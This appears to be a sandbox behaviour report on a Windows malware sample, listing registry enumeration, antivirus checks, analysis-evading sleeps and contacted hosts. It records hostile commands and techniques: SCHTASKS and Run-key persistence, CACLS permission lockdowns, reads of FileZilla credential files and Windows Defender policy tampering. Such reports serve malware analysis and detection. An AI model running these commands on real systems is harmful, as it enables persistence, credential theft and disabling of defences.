regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}
1 0 0

RegOpenKeyExW

regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d}
base_handle: 0x000002c0
key_handle: 0x0000028c
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}
1 0 0

RegOpenKeyExW

regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x000003d8
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

regkey_r: AddressBook
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

regkey_r: Connection Manager
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

regkey_r: DirectDrawEx
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

regkey_r: EditPlus
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus
1 0 0

RegOpenKeyExW

regkey_r: ENTERPRISE
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE
1 0 0

RegOpenKeyExW

regkey_r: Fontcore
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore
1 0 0

RegOpenKeyExW

regkey_r: Google Chrome
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
1 0 0

RegOpenKeyExW

regkey_r: Haansoft HWord 80 Korean
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean
1 0 0

RegOpenKeyExW

regkey_r: IE40
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40
1 0 0

RegOpenKeyExW

regkey_r: IE4Data
base_handle: 0x000003d8
key_handle: 0x000003dc
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data
1 0 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
wmi SELECT * FROM Win32_Processor
host 77.91.124.31
host 77.91.68.3
host 77.91.68.30
host 77.91.68.68
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
Time & API Arguments Status Return Repeated

ControlService

service_handle: 0x000000001a80c8c0
service_name: None
control_code: 1
0 0

ControlService

service_handle: 0x000000001a80cb00
service_name: None
control_code: 1
0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description danke.exe tried to sleep 157 seconds, actually delayed analysis time by 157 seconds
description outsidevariety.exe tried to sleep 2728223 seconds, actually delayed analysis time by 2728223 seconds
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\foto135.exe reg_value C:\Users\test22\AppData\Local\Temp\1000038051\foto135.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\fotod25.exe reg_value C:\Users\test22\AppData\Local\Temp\1000039051\fotod25.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\an.exe reg_value C:\Users\test22\AppData\Local\Temp\1000040051\an.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP004.TMP\"
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 reg_value rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP005.TMP\"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN danke.exe /TR "C:\Users\test22\AppData\Local\Temp\3ec1f323b5\danke.exe" /F
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
file C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
wmi SELECT * FROM Win32_VideoController
wmi SELECT * FROM AntivirusProduct
wmi SELECT * FROM Win32_OperatingSystem
wmi SELECT * FROM Win32_Process Where SessionId='1'
wmi SELECT * FROM AntiSpyWareProduct
wmi SELECT * FROM FirewallProduct
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
Time & API Arguments Status Return Repeated

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 ActiveX
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Adobe Flash Player 13 NPAPI
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x0000028c
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: EditPlus
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Chrome
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: HttpWatch Professional 9.3.39
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: 한컴오피스 한글 2010
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

key_handle: 0x000003dc
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
cmdline CACLS "..\3ec1f323b5" /P "test22:N"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline CACLS "danke.exe" /P "test22:R" /E
cmdline cmd /k echo Y|CACLS "danke.exe" /P "test22:N"&&CACLS "danke.exe" /P "test22:R" /E&&echo Y|CACLS "..\3ec1f323b5" /P "test22:N"&&CACLS "..\3ec1f323b5" /P "test22:R" /E&&Exit
cmdline CACLS "..\3ec1f323b5" /P "test22:R" /E
cmdline CACLS "danke.exe" /P "test22:N"
dead_host 77.91.68.30:80
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection